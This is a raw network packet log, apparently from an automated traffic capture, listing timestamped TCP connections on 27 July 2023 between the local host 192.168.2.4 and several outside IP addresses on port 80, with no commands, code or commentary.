                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012666941 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.012706041 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013421059 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013470888 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013514996 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013561010 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013607025 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013648033 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013679028 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013705015 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013745070 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013756990 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013814926 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013864040 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013912916 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.013961077 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014008999 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014056921 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014087915 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014116049 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014703989 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014772892 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014821053 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014868975 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014892101 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014919043 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014947891 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.014981031 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015609980 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015659094 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015696049 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015706062 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015726089 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015754938 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015779018 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015804052 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015818119 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015876055 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.015959024 CEST4977480192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.016428947 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.016493082 CEST8049772172.67.70.223192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.016505957 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.016552925 CEST4977280192.168.2.4172.67.70.223
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.043344021 CEST8049773122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.044083118 CEST8049773122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.044198036 CEST4977380192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.144577026 CEST8049774208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.144737005 CEST4977480192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.232312918 CEST4977480192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.361270905 CEST8049774208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.362149954 CEST8049774208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.362299919 CEST4977480192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.362971067 CEST8049774208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.363029003 CEST4977480192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.391098022 CEST4977480192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.435168028 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.436460972 CEST4977680192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.454797029 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.454909086 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.455565929 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.455750942 CEST4977780192.168.2.464.125.133.18
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.474968910 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.519745111 CEST8049774208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.519954920 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520057917 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520060062 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520107031 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520127058 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520154953 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520169020 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520201921 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520211935 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520248890 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520279884 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520324945 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520337105 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.520390034 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.521344900 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.521394968 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.521428108 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.521442890 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.521455050 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.521502018 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539684057 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539737940 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539784908 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539805889 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539832115 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539846897 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539846897 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539880991 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539889097 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539931059 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539943933 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539978981 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.539987087 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540024996 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540036917 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540091038 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540091038 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540138960 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540144920 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540184975 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540196896 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540230989 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540241003 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540288925 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540301085 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540352106 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540370941 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540405035 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540591002 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540637970 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540652037 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540683985 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540693045 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540730953 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540749073 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540777922 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540795088 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540823936 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540834904 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.540884018 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.559727907 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.559829950 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.559879065 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.559923887 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.559972048 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.559993982 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560020924 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560040951 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560040951 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560067892 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560076952 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560076952 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560121059 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560127020 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.560180902 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.564995050 CEST8049776208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.565139055 CEST4977680192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.575439930 CEST4977580192.168.2.4193.70.68.254
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.594924927 CEST8049775193.70.68.254192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.624766111 CEST4977680192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.755315065 CEST8049776208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.756632090 CEST8049776208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.756769896 CEST4977680192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.757188082 CEST8049776208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.757298946 CEST4977680192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.762666941 CEST4977680192.168.2.4208.97.178.138
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.891381979 CEST8049776208.97.178.138192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:46.981787920 CEST4977880192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.022939920 CEST4977980192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.039294958 CEST8049779188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.039489985 CEST4977980192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.039788961 CEST4977980192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.056024075 CEST8049779188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.068943977 CEST8049779188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.069103956 CEST4977980192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.139493942 CEST8049778107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.139672995 CEST4977880192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.166704893 CEST4977880192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.214903116 CEST4977980192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.235600948 CEST8049779188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.235759020 CEST4977980192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.324390888 CEST8049778107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.328433990 CEST8049778107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.328547001 CEST4977880192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.340744019 CEST4977880192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.486677885 CEST4978080192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.498891115 CEST8049778107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.585414886 CEST8049780165.227.252.190192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.585630894 CEST4978080192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.640945911 CEST4978080192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.643049955 CEST4978180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.738342047 CEST8049780165.227.252.190192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.738873959 CEST8049780165.227.252.190192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.739006042 CEST4978080192.168.2.4165.227.252.190
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.741720915 CEST8049781104.143.9.110192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.741836071 CEST4978180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.762636900 CEST4978280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.819159985 CEST4978180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.918067932 CEST8049781104.143.9.110192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.929553032 CEST8049781104.143.9.110192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:47.929691076 CEST4978180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.045854092 CEST8049782162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.045958042 CEST4978280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.088011980 CEST4978280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.356476068 CEST4978480192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.371085882 CEST8049782162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.372522116 CEST8049782162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.372622013 CEST4978280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.387945890 CEST8049784213.186.33.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.388061047 CEST4978480192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.424663067 CEST4978480192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.458826065 CEST8049784213.186.33.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.458937883 CEST4978480192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.500648022 CEST4978280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.589898109 CEST4978480192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.623296976 CEST8049784213.186.33.40192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.623389959 CEST4978480192.168.2.4213.186.33.40
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.784004927 CEST8049782162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.785104036 CEST8049782162.43.120.128192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:48.785183907 CEST4978280192.168.2.4162.43.120.128
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.417824030 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.436980009 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.437107086 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.437392950 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.456422091 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499392033 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499450922 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499500036 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499502897 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499502897 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499536991 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499572039 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.499624014 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526618004 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526736975 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526740074 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526789904 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526849031 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526905060 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526906967 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.526976109 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527038097 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527086020 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527184963 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527249098 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527270079 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527324915 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527343035 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527415037 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527421951 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527466059 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.527576923 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.528016090 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547358036 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547475100 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547528028 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547595024 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547600031 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547600031 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547600031 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547667027 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547691107 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547763109 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547807932 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547877073 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547894955 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547945976 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.547959089 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548010111 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548034906 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548099995 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548120975 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548196077 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548207998 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548260927 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548317909 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548387051 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548393965 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548465967 CEST4978580192.168.2.462.75.216.137
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548474073 CEST804978562.75.216.137192.168.2.4
                                                                                                                                                                                                                                                  Jul 27, 2023 21:52:49.548542976 CEST4978580192.168.2.462.75.216.137
